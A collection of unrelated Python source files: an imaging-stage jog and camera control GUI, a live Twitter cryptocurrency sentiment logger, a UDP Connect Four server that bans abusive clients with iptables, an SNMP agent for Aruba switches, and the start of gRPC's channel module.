self.app.imager.print_current_location()
def x_minus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentX < 1:
return
else:
gc.writeTemporary(currentX-1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_minus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentX < .1:
return
else:
gc.writeTemporary(currentX-.1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_plus_10(self):
currentX, currentY = self.app.imager.ping_location()
if currentY > maxY-10:
return
else:
gc.writeTemporary(currentX, currentY+10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_plus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentY > maxY-1:
return
else:
gc.writeTemporary(currentX, currentY+1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_plus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentY > maxY-.1:
return
else:
gc.writeTemporary(currentX, currentY+.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_minus_10(self):
currentX, currentY = self.app.imager.ping_location()
if currentY < 10:
return
else:
gc.writeTemporary(currentX, currentY-10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_minus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentY < 1:
return
else:
gc.writeTemporary(currentX, currentY-1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_minus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentY <0.1:
return
else:
gc.writeTemporary(currentX, currentY-0.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_10(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-10:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_1(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_01(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-0.1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+0.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_001(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-0.01:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+0.01)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_10(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 10:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ-10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_1(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ-1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_01(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 0.1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ-0.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_001(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 0.01:
return
else:
gc.writeTemporary(currentX, currentY, z = currentZ-0.01)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def calibrate(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if self.master.master.type.get() == "Intelli-plate 96-3":
print("> Calibrated location of A01-1 for Intelli-plate 96-3")
print("> ")
initFile = open("96-3_init.txt", "w")
self.app.FIRST_X = currentX
initFile.write(str(currentX) + '\n')
self.app.FIRST_Y = currentY
initFile.write(str(currentY) + '\n')
self.app.FIRST_Z = currentZ
initFile.write(str(currentZ))
initFile.close()
def set_Hue(self, v):
v = float(v)
v = int(v)
self.hue_var.set(v)
self.app.cam.set_hue(v)
def set_Saturation(self, v):
v = float(v)
v = int(v)
self.saturation_var.set(v)
self.app.cam.set_saturation(v)
def set_Brightness(self, v):
v = float(v)
v = int(v)
self.brightness_var.set(v)
self.app.cam.set_brightness(v)
def set_Contrast(self, v):
v = float(v)
v = int(v)
self.contrast_var.set(v)
self.app.cam.set_contrast(v)
def set_Gamma(self, v):
v = float(v)
v = int(v)
self.gamma_var.set(v)
self.app.cam.set_gamma(v)
# def set_Temp(self, v):
# v = float(v)
# v = int(v)
# self.temp_var.set(v)
# v2 = self.tint_var.get()
# self.master.master.cam.set_temperature_tint(v, v2)
# def set_Tint(self, v):
# v = float(v)
# v = int(v)
# self.tint_var.set(v)
# v1 = self.temp_var.get()
# self.master.master.cam.set_temperature_tint(v1, v)
|
4-live.py
|
coin = 'OKEX:DOGE-ETH'
#seconds between requests
time_to_sleep = 30
#how long to keep listening in minutes
time_alive = 20
max_id = 1510238364283338752
resolution = '1' # Available values: 1, 5, 15, 30, 60, 'D', 'W', 'M'
#twitter parameters for live tweets
def get_query_params_live(search_term, max_id):
return {'query': search_term,
'since_id': max_id,
'max_results': max_results,
'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',
'user.fields': 'id,name,username,created_at,description,public_metrics,verified',
'next_token': {}}
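# Each poll passes the newest tweet id seen so far as since_id, so only tweets
# newer than max_id are returned by the next request.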
def write_data(all_text):
data = finnhub_client.crypto_candles(coin, resolution, int(millis(minus_period(now(),to_period("T"+str(int((24*time_history)))+"H")))/1000), int(datetime.timestamp(datetime.now())))
    if data['s'] == 'ok' and len(data['s']) > 0 and data['c'] is not None and len(data['c']) > 0:
c_live = data['c'][0]
h_live = data['h'][0]
l_live = data['l'][0]
o_live = data['o'][0]
v_live = data['v'][0]
global max_id
i = 0
for t in all_text:
id_live = int(t['id'])
try:
if float(t['id'])!=None and max_id < float(t['id']):
globals()['max_id'] = int(t['id'])
combined_live = analyze_line(cleanText(t['text']))
negative_live = 100*combined_live.get('neg')
neutral_live = 100*combined_live.get('neu')
compound_live = 100*combined_live.get('compound')
positive_live = 100*combined_live.get('pos')
dateTime_live = t['created_at'][:-1]+" NY"
retweet_count_live = t['public_metrics']['retweet_count']
text_live = t['text'].split('\n', 1)[0]
tableWriter_live.write_row(t['text'], float(compound_live), float(negative_live), float(neutral_live), float(positive_live),to_datetime(dateTime_live), int(retweet_count_live), float(c_live), float(h_live), float(l_live), float(o_live), float(v_live))
i = i + 1
except:
print('error/NoneType')
print("finished writing rows: ", i)
return max_id
def thread_func_live():
global max_id
for i in range(0, time_alive*60, time_to_sleep):
query_params = get_query_params_live(search_term, max_id)
all_text = get_tweets(query_params)
max_id = write_data(all_text)
time.sleep(time_to_sleep)
tableWriter_live = DynamicTableWriter(
{"Text":dht.string, "Compound":dht.double, "Negative":dht.double, "Neutral":dht.double, "Positive":dht.double, "DateTime":dht.DateTime, "Retweet_count":dht.int_, "Close":dht.float64, "High":dht.float64, "Low":dht.float64, "Open":dht.float64, "Volume":dht.float64})
thread_live = Thread(target=thread_func_live)
thread_live.start()
live_data = tableWriter_live.table
|
server.py
|
import socket
import asyncio
import threading
import time
import numpy
import os
inGame = False
class NonNegativeNumpyIndex:
def __init__(self, numpyArray):
self.array = numpyArray
def __call__(self, rowOrSearchVal = None, col = None, value = None):
# print("A")
        if value is not None:
            self.array[rowOrSearchVal][col] = value
        elif col is not None:
            if rowOrSearchVal < 0 or col < 0:
                raise Exception("IndexOutOfBounds: No negative numbers permitted.")
            else:
                return self.array[rowOrSearchVal][col]
        else:
            return (self.array == rowOrSearchVal).sum()
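# Illustrative use of NonNegativeNumpyIndex: board = NonNegativeNumpyIndex(numpy.full((6, 7), -1));
# board(r, c) reads a cell, board(r, c, player) writes it, and board(-1) counts
# cells still holding the sentinel -1. Negative row/column reads raise instead of
# wrapping around like plain numpy indexing, which the win checks below rely on.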
def NormalGame(client1, client2):
global inGamePacketQueue
map = NonNegativeNumpyIndex(numpy.full(shape=(6,7), fill_value=-1))
_a = {}
_a[0], _a[1] = client1, client2
s.sendto(b'0', _a[0])
s.sendto(b'1', _a[1])
while True:
for sock in range(2):
while inGamePacketQueue[_a[sock]] == b'':
time.sleep(0.01)
if inGamePacketQueue[_a[(sock + 1) % 2]] == b'lg':
try:
s.sendto(b'lg', _a[sock])
except:
pass
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
return 0
slot = inGamePacketQueue[_a[sock]]
inGamePacketQueue[_a[sock]] = b''
if slot == b'lg':
try:
s.sendto(b'lg', _a[(sock + 1) % 2])
except:
pass
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
return 0
try:
dcSlot = slot.decode()
map(int(dcSlot[0]), int(dcSlot[1]), sock)
stop = False
except:
s.sendto(b'BANNED', _a[sock])
os.system("iptables -A INPUT -s " + _a[sock][0] + " -j DROP")
print("\033[93m" + _a[sock][0] + " has been BANNED")
try:
s.sendto(b'lg', _a[(sock + 1) % 2])
except:
pass
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
return 0
print(map.array)
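            # Win check: for every occupied cell, look for four equal marks in a
            # row horizontally, vertically and along both diagonals; out-of-range
            # probes raise and are swallowed by the try/except blocks.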
for r in range(0, 6):
for c in range(0,7):
if map(r,c) != -1:
try:
if (map(r,c) == map(r + 1,c) == map(r + 2,c) == map(r + 3,c)):
stop = True
print(1)
break
except:
pass
try:
if (map(r,c) == map(r - 1,c) == map(r - 2,c) == map(r - 3,c)):
stop = True
print(2)
break
except:
pass
try:
if (map(r,c) == map(r,c + 1) == map(r,c + 2) == map(r,c + 3)):
stop = True
print(3)
break
except:
pass
try:
if (map(r,c) == map(r,c - 1) == map(r,c - 2) == map(r,c - 3)):
stop = True
print(4)
break
except:
pass
try:
if (map(r,c) == map(r + 1,c + 1) == map(r + 2,c + 2) == map(r + 3,c + 3)):
stop = True
print(5)
break
except:
pass
try:
if (map(r,c) == map(r + 1,c - 1) == map(r + 2,c - 2) == map(r + 3,c - 3)):
stop = True
print(6)
break
except:
pass
try:
if (map(r,c) == map(r - 1,c - 1) == map(r - 2,c - 2) == map(r - 3,c - 3)):
print(map(r - 1,c - 1))
stop = True
print(7)
break
except:
pass
try:
if (map(r,c) == map(r - 1,c + 1) == map(r - 2,c + 2) == map(r - 3,c + 3)):
stop = True
print(8)
break
except:
pass
if (map(-1) == 0):
stop = True
s.sendto(b'd', _a[(sock + 1) % 2])
s.sendto(b'd', _a[sock])
return 0
if stop:
break
s.sendto(slot, _a[(sock + 1) % 2])
if stop:
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
s.sendto(b'l', _a[(sock + 1) % 2])
s.sendto(b'w', _a[sock])
return 0
if os.geteuid() != 0:
print("Root like permissions not found, exiting...")
quit()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 6543))
accepting = True
warned = {}
inGame = []
inGamePacketQueue = {}
gameQueue = {b'0':[]} # , b'1':[], b'2':[] ... to be added later
classDict = {b'0':NormalGame}
gameCount = 0
gameTHRESHOLD = 100
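# Wire protocol (UDP datagrams of up to 2 bytes): b'0' queues a client for a
# NormalGame, b'lg' leaves the queue or forfeits a running game, and in-game
# moves are two ASCII digits "rc" (row, column). acceptor() routes packets into
# gameQueue / inGamePacketQueue; dispatch() pairs queued clients into game threads.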
def acceptor():
while True:
data, addr = s.recvfrom(2)
try:
            if (data == b'lg') and (addr in gameQueue[b'0']):
                del gameQueue[b'0'][gameQueue[b'0'].index(addr)]
            elif (addr not in inGame) and (addr not in gameQueue[b'0']) and accepting:
                gameQueue[data].append(addr)
            else:
                inGamePacketQueue[addr] = data
        except:
            if (addr not in inGame) and (addr not in gameQueue[b'0']):
                if addr in warned:
                    warned[addr] += 1
                else:
                    warned[addr] = 1
                s.sendto(b'warning, YOU WILL BE BANNED', addr)
                print("\033[94m" + addr[0] + " has been warned")
if warned[addr] > 2:
s.sendto(b'BANNED', addr)
os.system("iptables -A INPUT -s " + addr[0] + " -j DROP")
print("\033[93m" + addr[0] + " has been BANNED")
del warned[addr]
def dispatch():
while accepting:
for i in range(len(gameQueue)):
if len(gameQueue[bytes(str(i), "utf-8")]) > 1:
threading.Thread(target=classDict[bytes(str(i), "utf-8")], args=(gameQueue[bytes(str(i), "utf-8")][0], gameQueue[bytes(str(i), "utf-8")][1])).start()
inGame.append(gameQueue[bytes(str(i), "utf-8")][0])
inGame.append(gameQueue[bytes(str(i), "utf-8")][1])
inGamePacketQueue[gameQueue[bytes(str(i), "utf-8")][0]] = b''
inGamePacketQueue[gameQueue[bytes(str(i), "utf-8")][1]] = b''
del gameQueue[bytes(str(i), "utf-8")][0]
del gameQueue[bytes(str(i), "utf-8")][0]
time.sleep(0.01)
threading.Thread(target=acceptor).start()
threading.Thread(target=dispatch).start()
while True:
shell = input()
if "e" in shell:
accepting = False
if "k" in shell:
print("\033[91m" + "KILLING SERVER... ")
accepting = False
s.shutdown(socket.SHUT_RDWR)
s.close()
break
|
snmp_aruba_agent.py
|
#!/usr/bin/python3 -tt
# -*- coding: utf-8 -*-
from twisted.internet import task
from twisted.python import log
import subprocess
import datetime
import threading
import time
import re
from sqlalchemy import and_
from sqlalchemy.orm.exc import NoResultFound
__all__ = ['SNMPArubaAgent']
class SNMPArubaAgent(object):
status_oid = '1.3.6.1.2.1.1'
oid_engine_time = '1.3.6.1.6.3.10.2.1.3'
inter_oids = {
'Speed': ('1.3.6.1.2.1.31.1.1.1.15', '#IF-MIB::ifSpeed.4227913 = Gauge32: 1000000000', 'Gauge32: ', 1),
'AdminStatus': ('1.3.6.1.2.1.2.2.1.7', '#IF-MIB::ifAdminStatus.4227913 = INTEGER: up(1)', 'INTEGER: ', 1),
'Description': (
'1.3.6.1.2.1.2.2.1.2', '#IF-MIB::ifDescr.4227913 = STRING: GigabitEthernet1/0/37', 'STRING: ', 1
),
'OperStatus': ('1.3.6.1.2.1.2.2.1.8', '#IF-MIB::ifOperStatus.4227913 = INTEGER: up(1)', 'INTEGER: ', 1),
'LastChange': (
'1.3.6.1.2.1.2.2.1.9', '#IF-MIB::ifLastChange.4227913 = Timeticks: (12849) 8 days, 17:10:01.11', '', 1
),
'Name': (
'1.3.6.1.2.1.31.1.1.1.1', '#IF-MIB::ifName.4227913 = STRING: GigabitEthernet1/0/37', 'STRING: ', 1
),
'mapping-1': (
'1.3.6.1.2.1.17.1.4.1.2', '#mapping - SNMPv2-SMI::mib-2.17.1.4.1.2.37 = INTEGER: 4227913',
'INTEGER: ', 2
),
'Vlan': (
'1.3.6.1.2.1.17.7.1.4.5.1.1', '#SNMPv2-SMI::mib-2.17.7.1.4.5.1.1.4227913 = Gauge32: 13', 'Gauge32: ', 1
),
'Alias': (
'1.3.6.1.2.1.31.1.1.1.18', '#1.3.6.1.2.1.31.1.1.1.18.59 = STRING: S1.3.043', 'STRING: ', 1
),
'mapping-2': (
'1.3.6.1.2.1.17.4.3.1.2',
'#mapping - SNMPv2-SMI::mib-2.17.7.1.2.2.1.2.13.24.169.5.52.121.109 = INTEGER: 37', 'INTEGER: ', 3
),
}
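    # Each inter_oids entry is (OID to walk, example snmpwalk output line, prefix
    # stripped from the value, grouping level used by join_data: 1 = keyed by
    # ifIndex, 2 = keyed by bridge port, 3 = keyed by MAC address).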
def __init__(self, db, snmpwalk_path, update_period, query_timeout):
self.db = db
self.snmpwalk_path = snmpwalk_path
self.update_period = int(update_period)
self.query_timeout = int(query_timeout)
def start(self):
"""Start the periodic checking."""
self.periodic = task.LoopingCall(self.update)
self.periodic.start(self.update_period, True)
def get_switch_status(self, ip, version, community, timeout):
bashCommand = self.snmpwalk_path + ' -t {0} -Cc -c {1} -v {2} -ObentU {3} {4}'
# oid = '1.3.6.1.2.1.1'
oid = self.status_oid
# 1.3.6.1.6.3.10.2.1.3 - snmp engine uptime in secs max value cca 50000 days
# 1.3.6.1.2.1.1.3.0 - sysuptime in Timeticks max value cca 500 days
informations = {
'1.0': ('1.3.6.1.2.1.1.1.0', 'description', 'STRING: '),
'2.0': ('1.3.6.1.2.1.1.2.0', 'objectID', 'OID: '),
'3.0': ('1.3.6.1.2.1.1.3.0', 'uptime', ''),
'4.0': ('1.3.6.1.2.1.1.4.0', 'contact', 'STRING: '),
'5.0': ('1.3.6.1.2.1.1.5.0', 'name', 'STRING: '),
'6.0': ('1.3.6.1.2.1.1.6.0', 'location', 'STRING: '),
'7.0': ('1.3.6.1.2.1.1.7.0', 'services', 'INTEGER: '),
}
data = {}
command = bashCommand.format(timeout, community, version, ip, oid)
        # ~ timeout - different (oid, ip) pairs need different timeouts => problem
output = subprocess.check_output(command.split(), timeout=self.query_timeout).decode('utf-8')
for line in output.split('\n')[:-1]:
            prefix_length = len(oid) + 2
            parsed_value = line[prefix_length:].split(' = ')
if parsed_value[0] in informations:
key = informations[parsed_value[0]][1]
data_prefix = informations[parsed_value[0]][2]
val = parsed_value[1][len(data_prefix):]
data[key] = val
# oid_engine_time = '1.3.6.1.6.3.10.2.1.3'
oid_engine_time = self.oid_engine_time
command = bashCommand.format(timeout, community, version, ip, oid_engine_time)
output = subprocess.check_output(command.split(), timeout=self.query_timeout).decode('utf-8')
parsed_value = output.split('\n')[0].split(' = INTEGER: ')
data['engineUptime'] = parsed_value[1]
return data
def get_interfaces(self, ip, version, community, timeout):
bashCommand = self.snmpwalk_path + ' -t {0} -Cc -c {1} -v {2} -ObentU {3} {4}'
oids = self.inter_oids
data = {}
ordered_oids = [('mapping-2', oids['mapping-2']), ]
for key, val in oids.items():
if key != 'mapping-2':
ordered_oids.append((key, val))
for key, val in ordered_oids:
oid = val[0]
command = bashCommand.format(timeout, community, version, ip, oid)
            # ~ timeout - different (oid, ip) pairs need different timeouts => problem
output = subprocess.check_output(command.split(), timeout=self.query_timeout).decode('utf-8')
data[key] = []
for x in output.split('\n')[:-1]:
                prefix_length = len(val[0]) + 2
                parsed_value = x[prefix_length:].split(' = ' + val[2])
data[key].append(parsed_value)
return self.join_data(data)
def join_data(self, data):
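        # Group the walked values by key type (see the inter_oids levels), attach
        # the MAC addresses learned per bridge port ('mapping-2') to the matching
        # bridge-port entry, then carry them over to the ifIndex entry via
        # 'mapping-1'; the result is one dict per interface, keyed by ifIndex.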
oids = self.inter_oids
mapped_vals = {}
for prop, oid in oids.items():
if not oid[3] in mapped_vals:
mapped_vals[oid[3]] = {}
for val in data[prop]:
                if val[0] not in mapped_vals[oid[3]] and len(val) == 2:
                    mapped_vals[oid[3]][val[0]] = {}
                if len(val) == 2:
                    mapped_vals[oid[3]][val[0]][prop] = val[1]
for key, val in mapped_vals[3].items():
if 'mapping-2' in val:
if val['mapping-2'] in mapped_vals[2]:
if not ('MACs' in mapped_vals[2][val['mapping-2']]):
mapped_vals[2][val['mapping-2']]['MACs'] = []
tmp_MAC = key.split('.')
MAC = "{:02X} {:02X} {:02X} {:02X} {:02X} {:02X}".format(
int(tmp_MAC[0]), int(tmp_MAC[1]), int(tmp_MAC[2]),
int(tmp_MAC[3]), int(tmp_MAC[4]), int(tmp_MAC[5])
)
mapped_vals[2][val['mapping-2']]['MACs'].append(MAC)
for key, val in mapped_vals[2].items():
if not ('MACs' in val):
val['MACs'] = []
if val['mapping-1'] in mapped_vals[1]:
mapped_vals[1][val['mapping-1']]['MACs'] = val['MACs']
for key, val in mapped_vals[1].items():
if not ('MACs' in val):
val['MACs'] = []
return mapped_vals[1]
def save_to_db(self, switch, data):
sw_info = data['switch']
self.save_if_to_db(switch, data['interfaces'], sw_info['uptime'])
self.save_if_topology_to_db(switch, data['interfaces'])
switch.uptime = '{} seconds'.format(int(sw_info['engineUptime']))
switch.sys_description = sw_info['description']
switch.sys_objectID = sw_info['objectID']
switch.sys_contact = sw_info['contact']
switch.sys_name = sw_info['name']
switch.sys_location = sw_info['location']
switch.sys_services = int(sw_info['services'])
switch.last_update = datetime.datetime.now()
self.db.commit()
def process_speed(self, data, name, admin_status, oper_status):
# link (adm) down, speed auto => non zero value
if admin_status != 1 or oper_status != 1:
return None
speed = int(data)
if speed == 0:
return None
return speed
def process_vlan(self, data):
vlan = int(data)
if vlan < 1 or vlan > 4096:
vlan = None
return vlan
def process_last_change(self, data, sw_uptime):
last_change = int(data)
uptime = int(sw_uptime)
if last_change < 1:
return None
if last_change > uptime:
# limitation of SNMP Timeticks datatype (max value = 4294967295 eq. 500 days)
uptime += 4294967296
return '{} seconds'.format((uptime - last_change) // 100)
def save_if_topology_to_db(self, switch, data):
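        # Map each "unit/port" interface name onto a patch_panel/port pair for this
        # switch's analyzer (creating missing rows), link it to the port named by
        # the interface Alias when one exists, and point the sw_interface row at
        # the resulting port.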
analyzer = self.db.analyzer.filter_by(name=switch.name).one()
for key, val in data.items():
if not re.match(r'\d+/\d+', val['Name']):
continue
unit_number, interface_number = map(int, val['Name'].split('/', 2))
where = and_(self.db.patch_panel.analyzer == analyzer.uuid,
self.db.patch_panel.pp_id_in_analyzer == unit_number)
try:
patch_panel = self.db.patch_panel.filter(where).one()
except NoResultFound:
self.db.patch_panel.insert(pp_id_in_analyzer=unit_number, analyzer=analyzer.uuid)
self.db.commit()
finally:
patch_panel = self.db.patch_panel.filter(where).one()
where = and_(self.db.port.patch_panel == patch_panel.uuid,
self.db.port.name == val['Name'])
try:
port = self.db.port.filter(where).one()
except NoResultFound:
self.db.port.insert(
patch_panel=patch_panel.uuid,
position_on_pp=interface_number,
name=val['Name'],
type='sw'
)
self.db.commit()
finally:
port = self.db.port.filter(where).one()
try:
other_port = self.db.port.filter_by(name=val['Alias']).one()
other_port.connect_to = port.uuid
port.connect_to = other_port.uuid
self.db.commit()
except NoResultFound:
pass
where = and_(self.db.sw_interface.switch == switch.uuid,
self.db.sw_interface.name == val['Name'])
interface = self.db.sw_interface.filter(where).one()
if interface.port != port.uuid:
interface.port = port.uuid
self.db.commit()
def save_if_to_db(self, switch, data, sw_uptime):
for key, val in data.items():
where = and_(self.db.sw_interface.switch == switch.uuid, self.db.sw_interface.name == val['Name'])
try:
interface = self.db.sw_interface.filter(where).one()
except NoResultFound:
self.db.sw_interface.insert(name=val['Name'], switch=switch.uuid)
self.db.commit()
update_time = datetime.datetime.now()
for key, val in data.items():
if not ('Vlan' in val):
val['Vlan'] = 0
where = and_(self.db.sw_interface.switch == switch.uuid, self.db.sw_interface.name == val['Name'])
interface = self.db.sw_interface.filter(where).one()
# SNMP up = 1, down = 2
interface.admin_status = 2 - int(val['AdminStatus'])
interface.oper_status = 2 - int(val['OperStatus'])
interface.speed = self.process_speed(
val['Speed'], val['Name'], interface.admin_status, interface.oper_status
)
interface.vlan = self.process_vlan(val['Vlan'])
interface.last_change = self.process_last_change(val['LastChange'], sw_uptime)
self.db.mac_address.filter_by(interface=interface.uuid).delete()
if interface.ignore_macs is False:
if len(val['MACs']) > 0:
self.db.last_macs_on_interface.filter_by(interface=interface.uuid).delete()
for mac in val['MACs']:
self.db.mac_address.insert(mac_address=mac, interface=interface.uuid,)
self.db.last_macs_on_interface.insert(
mac_address=mac, interface=interface.uuid, time=update_time)
try:
db_mac = self.db.last_interface_for_mac.filter(
self.db.last_interface_for_mac.mac_address == mac
).one()
db_mac.interface = interface.uuid
db_mac.time = update_time
except NoResultFound:
self.db.last_interface_for_mac.insert(
mac_address=mac, interface=interface.uuid, time=update_time
)
else:
self.db.last_macs_on_interface.filter_by(interface=interface.uuid).delete()
self.db.last_interface_for_mac.filter_by(interface=interface.uuid).delete()
self.db.commit()
def parallel_update(self, switch, output):
start = time.time()
try:
output[switch.uuid]['interfaces'] = self.get_interfaces(
switch.ip_address, switch.snmp_version,
switch.snmp_community, switch.snmp_timeout
)
output[switch.uuid]['switch'] = self.get_switch_status(
switch.ip_address, switch.snmp_version,
switch.snmp_community, switch.snmp_timeout
)
except Exception as e:
log.msg(('Error while getting data from {}({}), {}'.format(switch.name, switch.ip_address, e)))
return
log.msg('{} finished ({:.03f} s)'.format(switch.name, time.time() - start))
def update(self):
log.msg('Interface status sync started')
start = time.time()
threads = []
data = {}
for switch in self.db.switch.filter_by(enable=True, type='aruba').all():
data[switch.uuid] = {'switch': None, 'interfaces': None}
t = threading.Thread(target=self.parallel_update, args=(switch, data))
t.start()
threads.append(t)
for t in threads:
t.join()
for switch in self.db.switch.filter_by(enable=True, type='aruba').all():
if data[switch.uuid]:
try:
self.save_to_db(switch, data[switch.uuid])
except Exception as e:
log.msg(('Error during saving data from {}({}) to db, {}'.format(
switch.name, switch.ip_address, e,
)))
log.msg('Interface status sync finished ({:.03f} s)'.format(time.time() - start))
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
